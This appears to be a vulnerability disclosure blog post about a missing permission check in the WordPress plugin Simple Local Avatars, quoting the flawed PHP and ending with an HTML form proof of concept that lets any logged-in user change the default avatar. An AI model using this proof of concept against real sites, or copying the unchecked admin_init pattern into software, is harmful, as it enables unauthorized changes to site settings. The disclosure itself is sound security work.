Last week, we saw what looked to be a hacker probing for usage of the WordPress plugin Simple Local Avatars (from 10up) by requesting the following file from it, across our websites and third-party data we monitor:

/wp-content/plugins/simple-local-avatars/readme.txt

The apparent hacker looks to be targeting other plugins with known exploitable vulnerabilities in older versions, so that might suggest the same for this plugin, but we couldn’t find any mention of older versions having a vulnerability hackers would target.

Doing some checking over the plugin, we found that the current version of it does have a vulnerability, though one that isn’t something hackers are known to target. The vulnerability allows those logged in to WordPress to change the default avatar shown by the plugin.

In the file /includes/class-simple-local-avatars.php, the plugin registers the function admin_init() to run during admin_init:

104

add_action( 'admin_init', array( $this, 'admin_init' ) );

That makes it accessible to even those not logged in to WordPress.

That function doesn’t do any security checks to limit access before beginning to run its code:

542
543

public function admin_init() {
	$this->define_avatar_ratings();

At the end of the function, it calls the function save_default_avatar_file_id():

622
623
624

	// Save default avatar file.
	$this->save_default_avatar_file_id();
}

That function will update the WordPress option (setting) simple_local_avatar_default to an integer value provided that the variable $pagenow is options.php:

1457
1458
1459
1460
1461
1462
1463
1464
1465
1466

private function save_default_avatar_file_id() {
	global $pagenow;
 
	$file_id = filter_input( INPUT_POST, 'simple-local-avatar-file-id', FILTER_SANITIZE_NUMBER_INT );
 
	// check for uploaded files
	if ( 'options.php' === $pagenow && ! empty( $file_id ) ) {
		update_option( 'simple_local_avatar_default', $file_id );
	}
}

That condition will be true for someone logged in to WordPress that accesses the page /wp-admin/options.php, even if they are a low level user which gets shown the message “You need a higher level of permission.” if they access it.

WordPress Causes Full Disclosure

As a protest of the moderators of the WordPress Support Forum’s continued inappropriate behavior we changed from reasonably disclosing to full disclosing vulnerabilities for plugins in the WordPress Plugin Directory in protest, until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.)

You can notify the developer of this issue on the forum as well.

After four years, the moderators have finally tacitly admitted they were behaving inappropriately and have made moves to fix the problems (though incompletely), so these full disclosures can be ended if they simply restore access to our accounts and plugins in the Plugin Directory. Hopefully that takes less than four years.

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Proof of Concept

The following proof of concept will cause the default avatar to be set to ID 1, when logged in to WordPress.

Replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/options.php" method="POST">
<input type="hidden" name="simple-local-avatar-file-id" value="1" />
<input type="submit" value="Submit" />
</form>
</body>

Concerned About The Security of the Plugins You Use?